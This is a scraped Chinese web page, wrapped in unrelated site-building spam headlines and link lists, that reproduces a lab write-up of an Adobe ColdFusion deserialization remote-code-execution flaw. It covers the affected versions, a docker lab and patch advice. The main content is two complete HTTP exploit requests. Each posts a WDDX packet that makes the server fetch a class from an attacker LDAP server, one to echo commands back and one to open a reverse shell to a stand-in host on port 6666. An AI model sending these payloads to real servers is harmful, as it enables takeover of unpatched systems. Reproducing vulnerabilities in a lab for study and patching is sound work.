当前位置: 首页 > news >正文

网站建设与网页制作案例教程网站的流量是怎么回事

news 2025/11/2 10:54:27
网站建设与网页制作案例教程,网站的流量是怎么回事,怎样免费网站建设,建筑行业0x01 产品简介 Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。 0x02 漏洞概述 Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击…

0x01 产品简介

      Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。

0x02 漏洞概述

     Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。

0x03 影响范围

    ColdFusion 2018 <= Update 16 

    ColdFusion 2021 <= Update 6 

    ColdFusion 2023 GA Release (2023.0.0.330468)

0x04 复现环境

 docker搭建ColdFusion 2023.0.0.330468漏洞环境

拉取镜像

docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

启动环境

docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

 PS:需确认8080对应的端口

验证是否可访问环境

0x05 漏洞复现

exp

POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: idargumentCollection=
<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://your-ip:1389/Basic/TomcatEcho</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data>
</wddxPacket>

PS:本次复现需要使用jndi漏洞利用工具(JNDIExploit-1.4-SNAPSHOT.jar)

TomcatEcho回显链

 开启监听

反弹shell

利用链:

POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencodedargumentCollection=
<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://vpsip:1389/Basic/ReverseShell/vpsip/6666</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data>
</wddxPacket>

 

 0x06 修复建议

根据影响版本中的信息,建议相关用户尽快更新至安全版本:

ColdFusion 2018 Update 17

ColdFusion 2021 Update 7

ColdFusion 2023 Update 1

下载链接请参考:

https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html

http://www.yayakq.cn/news/626827/

相关文章:

  • 怎么做前端网站品牌vi包括什么
  • 广告设计公司的经营范围seo排名优化推广
  • 网站如何能吸引用户源码交易平台网站源码
  • 营销型网站的好处绥德网站建设设计
  • 网站备案 类型成都网站建设推
  • 自建商城网站微商可以做网站推广吗
  • 连南网站建设wordpress 如何生成 htlm
  • 南明区住房和城乡建设局网站上交三百能在网站上找兼职做的
  • 医院网站建设预算表wordpress修改首页模板文件名
  • 网站拉圈圈接口怎么做自建手机网站
  • 网站建设方案word做源码网站赚钱吗
  • 太仓市质监站网址厦门网站搜索优化
  • 做电影资源网站违法吗做网站需要字体授权
  • 电子商务做网站骗钱怎么办女式包包网站建设定位
  • 网站建设项目规划书企业网站建站企业
  • 安徽省工程建设信息网站本周国内新闻
  • dede 网站地图样式昌大建设集团
  • 石家庄教育平台网站建设建设摩托车官网中国官网报价大全
  • wordpress 个人国内收款什么是seo优化?
  • 移动网站推广如何优化wordpress查询数据库
  • 一个人能建网站吗宝塔搭建wordpress负载高
  • html网站开发实验报告小程序制作策划案
  • 网页广告弹窗怎么屏蔽西安seo盐城
  • 怎样免费建立自己网站二手市场网站开发
  • 自己做免费的网站吗四大央企是哪四大企业
  • 抚顺网站建设太原seo排名优化软件
  • 购买帝国cms做网站代理2021年最新的网站
  • 互联网开网站怎么做转转免费假链接制作器
  • 凡科2网站需要备案吗自己做网站才是互联网
  • 做年会的网站长沙高端网站建设公司